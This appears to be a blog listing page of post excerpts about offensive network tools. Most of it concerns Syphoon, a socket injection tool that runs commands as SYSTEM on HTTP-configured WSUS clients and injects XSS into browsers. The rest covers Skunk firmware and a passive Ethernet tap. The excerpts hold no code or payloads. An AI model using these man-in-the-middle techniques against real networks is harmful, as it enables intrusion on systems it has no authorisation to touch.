The power of dynamic socket injection: WSUS command execution as [NT AUTHORITY/SYSTEM]
Context Some time ago we published an important update to Syphoon, featuring the new dynamic socket injection system. In short, this allows using Ruby code to generate content on the fly for context-dependent injections. Taking things further To demonstrate the power of dynamic injections, we thought we'd publish a new release of Syphoon, this time including some new scripts. Specifically, two new scripts are provided to attack the Windows Update system (WSUS) when configured to use HTTP. wsus-inject-cmd This first script simply allows running commands (through cmd.exe) as 'NT AUTHORITY/SYSTEM' on any client machine requesting WSUS through HTTP. This is...
Pwn harder with dynamic injection in Syphoon 1.4.0
The best socket injection system just got better Socket injection is big fun for sure. Easily drop XSS-based attacks on victim browsers with a simple regex, inject payloads within SMTP/POP emails, or simply embed raccoon pictures in every web page. However, static strings can only take us so far. There comes a point when we start thinking it would be nice for the string to be a bit more flexible, maybe even dependent on specific conditions for each injection. This is taking us into the realm of dynamic injection. Introducing dynamic injection Instead of simply asking Syphoon to insert some...
Skunk firmware 1.2.0 released - VLAN support, multiple sniff output ports and more
After reading many of your messages about the Skunk and its features, I was able to get a better understanding of what most users needed. I took some time the past few days to work on implementing the features that seemed to warrant the highest attention. So here it is (finally): version 1.2.0 of the Skunk firmware. In in this article I will try to present the changes brought along by this new update. A better command-line interface One of the key advantages of the Skunk is the simplicity with which it can be configured, simply by plugging in a...
Introducing Netsplit: a pocket-sized passive Ethernet tap
Meet the Swiss pocket knife of network traffic inspection Netsplit is a passive Ethernet tap device, making it easy to sniff packets across Ethernet links. Place the Netsplit between two devices and monitor network traffic on the tap ports. This works by forcing the devices into 10/100 mode (prohibiting gigabit-speed comms) also known as "Fast Ethernet", which is well suited for passive monitoring. The two ports at the ends of the Netsplit are wired together normally as would a standard cable. However, their respective transmission lines are mirrored to the center "tap" ports. Because only the transmission lines are mirrored to...
- 3D print
- Swiss day